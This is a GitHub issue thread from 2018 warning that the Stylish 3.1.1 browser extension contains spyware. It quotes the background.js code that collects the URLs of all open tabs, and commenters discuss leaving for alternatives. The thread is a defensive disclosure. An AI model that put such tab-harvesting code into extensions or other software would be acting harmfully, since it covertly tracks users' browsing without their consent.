Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[WARNING] Stylish 3.1.1 in AMO contains spyware #335

Open
Lekensteyn opened this issue Jul 4, 2018 · 5 comments
Open

[WARNING] Stylish 3.1.1 in AMO contains spyware #335

Lekensteyn opened this issue Jul 4, 2018 · 5 comments

Comments

@Lekensteyn
Copy link

Lekensteyn commented Jul 4, 2018
edited

Hi users of Stylish,

It appears that the Stylish extension (based on the code in this repo) has gained tracking code. Using Rob's excellent CRX Viewer I noticed some fishy code in src/background.js that was loaded on startup and code that was injected in every Google search page. Effects:

  1. The full URL of all open tabs and all pages you visit.
  2. The titles, URLs and of every Google search result

Recommended steps:

  1. Remove the Stylish extension (Firefox should already have disabled the extension)
  2. (Optional:) install https://github.com/openstyles/stylus as replacement

Proof: https://twitter.com/Lekensteyn/status/1014307299475763201
More details:
https://robertheaton.com/2018/07/02/stylish-browser-extension-steals-your-internet-history/
https://bugzilla.mozilla.org/show_bug.cgi?id=1472948

Relevant extract for the first issue (src/background.js):

chrome.windows.getAll({
    populate: true
}, function(windows) {
    for (var w = 0; w < windows.length; w++) {
        for (var i = 0; i < windows[w].tabs.length; i++) {
            if (!isRealUrlAddress(windows[w].tabs[i].url)) {
                continue;
            }
            stylesUpdater.updateQueryParams(windows[w].tabs[i].id, {
                reset: true,
                gp: windows[w].tabs[i].url // <-- WTF
            });
            if (windows[w].focused && windows[w].tabs[i].active) {
                stylesUpdater.gpStyleUpdate(windows[w].tabs[i]);
            }
        }
    }
});
@333van
Copy link

333van commented Jul 4, 2018

The news was available in 2017. You can opt-out but I am leaving Stylish and going for Stylus.

@Lekensteyn
Copy link
Author

@IAMEVANHE AFAIK that was limited to the Chrome extension, I don't know when the Firefox extension started getting such malicious behavior.

@sparskakyl
Copy link

Well, you can modify/remove fishy code to make it not spyware.

@Lekensteyn
Copy link
Author

@sparskakyl You are missing the point.

"Vertrouwen komt te voet en vertrekt te paard." [nl]
"Once bitten, twice shy"

There is no way I am ever going to use this extension again. Perhaps Stylus, but for now I have replaced the styles that I still use by some Greasemonkey scripts. For example:

// ==UserScript==
// @name      Style: Show Bugzilla attachment ID
// @namespace https://lekensteyn.nl/
// @match     https://bugs.wireshark.org/*
// @version   1
// @grant     none
// ==/UserScript==

((css) => {
  let style = document.createElement("style");
  style.textContent = css;
  document.body.appendChild(style);
})(`
a[href^="#attach_"]:before {
  font-size: medium;
  content: attr(href) ": ";
}
`);

@dragetd
Copy link

dragetd commented Jul 7, 2018

The original author sold the name and mozilla addon repo access to a data mining company. He was fully aware where this was going and left the users in the dark which did not activaly search for this information.

I blame @JasonBarnabe just as much as this company for this move!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
4 participants
@Lekensteyn @dragetd @333van @sparskakyl